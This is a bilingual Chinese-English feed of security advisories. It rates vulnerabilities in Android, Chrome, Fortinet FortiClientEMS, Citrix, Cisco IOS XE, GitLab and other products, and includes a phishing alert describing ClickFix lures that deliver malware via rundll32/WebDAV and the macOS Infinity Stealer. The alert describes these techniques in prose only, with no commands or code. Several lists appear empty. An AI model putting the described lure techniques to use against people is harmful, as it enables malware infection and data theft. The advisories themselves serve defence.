風險: 中度風險
類型: 操作系統 - 流動裝置及操作系統
於 Android 發現一個漏洞。遠端攻擊者可利用這漏洞,於目標系統觸發阻斷服務狀況。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
RISK: Medium Risk
TYPE: Operating Systems - Mobile & Apps
A vulnerability was identified in Android. A remote attacker could exploit this vulnerability to trigger denial of service condition on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
風險: 中度風險
類型: 用戶端 - 瀏覽器
於 Mozilla 產品發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發阻斷服務狀況及遠端執行任意程式碼。
以下版本之前的版本﹕
在安裝軟體之前,請先瀏覽供應商之官方網站,以獲得更多詳細資料。
更新至版本:
RISK: Medium Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Mozilla Products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition and remote code execution on the targeted system.
Versions prior to:
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 極高度風險
類型: 操作系統 - Network
於 Fortinet FortiClientEMS 發現一個漏洞。遠端攻擊者可利用此漏洞,於目標系統觸發遠端執行任意程式碼及權限提升。
注意:
CVE-2026-35616 正在被廣泛利用。FortiClient EMS 中存在不當存取控制(Improper Access Control)漏洞,可能允許未經身份驗證的攻擊者透過精心設計的請求,執行未經授權的程式碼或指令。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
RISK: Extremely High Risk
TYPE: Operating Systems - Networks OS
A vulnerability has been identified in Fortinet FortiClientEMS. A remote attacker could exploit this vulnerability to trigger remote code execution and elevation of privilege on the targeted system.
Note:
CVE-2026-35616 is being exploited in the wild. An Improper Access Control vulnerability in FortiClient EMS may allow an unauthenticated attacker to execute unauthorized code or commands via crafted requests.
Before installation of the software, please visit the vendor web-site for more details.
風險: 高度風險
類型: 操作系統 - LINUX
於 SUSE Linux 內核發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發阻斷服務狀況、權限提升及繞過保安限制。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: High Risk
TYPE: Operating Systems - Linux
Multiple vulnerabilities were identified in SUSE Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 高度風險
類型: 用戶端 - 瀏覽器
於 Google Chrome 發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發遠端執行任意程式碼、阻斷服務狀況、繞過保安限制、資料篡改及洩露敏感資料。
注意:
CVE-2026-5281 正在被廣泛利用。該漏洞允許已經入侵渲染程序的遠端攻擊者,透過精心製作的 HTML 網頁觸發遠端執行任意程式碼。因此,該漏洞的風險等級被評為高度風險。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝軟件供應商提供的修補程式:
RISK: High Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Google Chrome. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, denial of service condition, security restriction bypass, data manipulation and sensitive information disclosure on the targeted system.
Note:
CVE-2026-5281 is being exploited in the wild. The vulnerability allow a remote attacker who had compromised the renderer process to execute arbitrary code via a crafted HTML page. Hence, the risk level is rated as High Risk.
Before installation of the software, please visit the software vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 中度風險
類型: 操作系統 - LINUX
於 RedHat Linux核心發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發資料篡改、阻斷服務狀況、權限提升及洩露敏感資料。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: Medium Risk
TYPE: Operating Systems - Linux
Multiple vulnerabilities were identified in RedHat Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger data manipulation, denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 中度風險
類型: 操作系統 - Network
於 Citrix 產品發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發阻斷服務狀況及洩露敏感資料。
注意:
CVE-2026-3055 正在被廣泛利用。該漏洞是由於輸入驗證不足引起,而導致記憶體被越界讀取。Citrix ADC 或 Citrix Gateway 必須配置為 SAML IDP 才會受到影響。因此,該漏洞的風險等級被評為中度風險。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: Medium Risk
TYPE: Operating Systems - Networks OS
Multiple vulnerabilities were identified in Citrix Products. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition and sensitive information disclosure on the targeted system.
Note:
CVE-2026-3055 is being exploited in the wild. The vulnerability is caused by insufficient input validation leading to memory overread. Citrix ADC or Citrix Gateway must be configured as a SAML IDP to be vulnerable. Hence, the risk level is rated as Medium Risk.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
類別: 網絡釣魚
最近的威脅情報顯示,名為 "ClickFix" 的攻擊手法原本主要針對 Microsoft Windows,但如今已演變出新的變種,並鎖定 macOS 的用戶。此演變顯示該技術正不在斷進化,被更多不同的攻擊者利用。
傳統針對 Windows 的 ClickFix 攻擊
這類攻擊模仿網站常見的,用以區分合法使用者與機器人的「Verify You are a Human」測試。受害者被網站誘導按下特定鍵盤組合,最終導致在 Microsoft Windows 系統上下載並執行惡意軟體。
攻擊的過程通常如下:
針對 Windows 的最新變種 – 惡意利用 Windows 合法組件 rundll32.exe 與 WebDAV
最新的 ClickFix 變種惡意利用 Windows 合法組件 rundll32.exe 與 WebDAV 來傳送惡意載荷。它透過 ordinal calls 載入遠端 DLL,以規避偵測,減少對腳本引擎的依賴並繞過傳統監控。這種轉向透過利用 Windows 原生組件的方式,結合反分析技術,使攻擊更隱蔽且更難被發現。
(針對 Windows 用戶的 ClickFix 攻擊)
針對 macOS 用戶的變種 – Infinity Stealer
針對 macOS 的 ClickFix 變種透過假的 Cloudflare CAPTCHA 誘騙使用者,傳送 Infinity Stealer。受害者被誘導將惡意 curl 指令貼入 macOS Terminal,安裝一個使用 Nuitka 編譯的 Python-based infostealer,以增強逃避偵測能力。
Infinity Stealer 的功能包括:
所有被竊取的資料會透過 HTTP POST 請求傳送至 C2 server,並在完成後向攻擊者發送 Telegram 通知。此攻擊活動突顯 ClickFix 從 Windows 擴展至 macOS,並採用更先進、更隱蔽的技術。
.jpg)
(針對 macOS 用戶的 ClickFix 攻擊)
(來源: https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/)
建議
各機構及用戶應對不斷演變的 ClickFix 攻擊手法保持警覺,並採取主動措施以防止系統遭入侵,該手法現已同時針對 Windows 與 macOS 系統。為防範相關的 ClickFix 攻擊,請採取以下措施:
Type: Phishing
Recent threat intelligence indicates that ClickFix tactics, originally targeting Microsoft Windows, have now evolved with a new variant aimed at macOS. This expansion demonstrates that the technique is increasingly being deployed by multiple attackers.
Traditional Windows-focused ClickFix attacks
These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots. Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.
The deceptive process typically unfolds as follows:
Latest Windows Variant – Abusing Windows components Rundll32 & WebDAV
The most recent ClickFix variant maliciously abuses legitimate Windows components, rundll32.exe and WebDAV to deliver payloads. It loads remote DLLs via ordinal calls to evade detection, reducing reliance on script engines and bypassing traditional monitoring. This shift to native Windows components, combined with anti-analysis techniques, makes the attack stealthier and harder to detect.
(ClickFix attack targetting Windows users)
macOS Variant – Infinity Stealer
A new macOS-targeted ClickFix variant delivers Infinity Stealer via fake Cloudflare CAPTCHA lures. Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.
Infinity Stealer can:
All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion. This campaign highlights ClickFix’s expansion from Windows to macOS, employing more advanced and stealthy techniques.
(ClickFix attack targetting macOS users)
(Ref: https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/)
Recommendations
Organisations and individuals are urged to stay alert to evolving ClickFix phishing tactics, which now target both Windows and macOS systems, and take proactive measures to prevent compromise. To guard against related ClickFix attacks, please take the following measures:
風險: 中度風險
類型: 用戶端 - 瀏覽器
於 Microsoft Edge 發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發遠端執行任意程式碼、阻斷服務狀況及洩露敏感資料。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝軟件供應商提供的修補程式:
RISK: Medium Risk
TYPE: Clients - Browsers
Multiple vulnerabilities were identified in Microsoft Edge. A remote attacker could exploit some of these vulnerabilities to trigger remote code execution, denial of service condition and sensitive information disclosure on the targeted system.
Before installation of the software, please visit the software vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 中度風險
類型: 保安軟件及應用設備 - 保安軟件及應用設備
於思科 IOS XE 發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發洩露敏感資料、阻斷服務狀況、遠端執行任意程式碼、繞過保安限制及權限提升。
請參考供應商發佈的連結以了解受影響的設備:
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: Medium Risk
TYPE: Security software and application - Security Software & Appliance
Multiple vulnerabilities were identified in Cisco IOS XE. A remote attacker could exploit some of these vulnerabilities to trigger sensitive information disclosure, denial of service condition, remote code execution, security restriction bypass and elevation of privilege on the targeted system.
For affected devices, please refer to the link issued by the vendor:
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 中度風險
類型: 伺服器 - 其他伺服器
於 GitLab 發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發阻斷服務狀況、權限提升、彷冒、洩露敏感資料、跨網站指令碼、資料篡改及繞過保安限制。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: Medium Risk
TYPE: Servers - Other Servers
Multiple vulnerabilities were identified in GitLab. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege, spoofing, sensitive information disclosure, cross-site scripting, data manipulation and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
風險: 中度風險
類型: 伺服器 - 互聯網應用伺服器
於 IBM WebSphere 產品發現多個漏洞。遠端攻擊者可利用這些漏洞,於目標系統觸發權限提升、彷冒、洩露敏感資料、資料篡改及繞過保安限制。
在安裝軟體之前,請先瀏覽供應商之網站,以獲得更多詳細資料。
安裝供應商提供的修補程式:
RISK: Medium Risk
TYPE: Servers - Internet App Servers
Multiple vulnerabilities were identified in IBM WebSphere Products. A remote attacker could exploit some of these vulnerabilities to trigger elevation of privilege, spoofing, sensitive information disclosure, data manipulation and security restriction bypass on the targeted system.
Before installation of the software, please visit the vendor web-site for more details.
Apply fixes issued by the vendor:
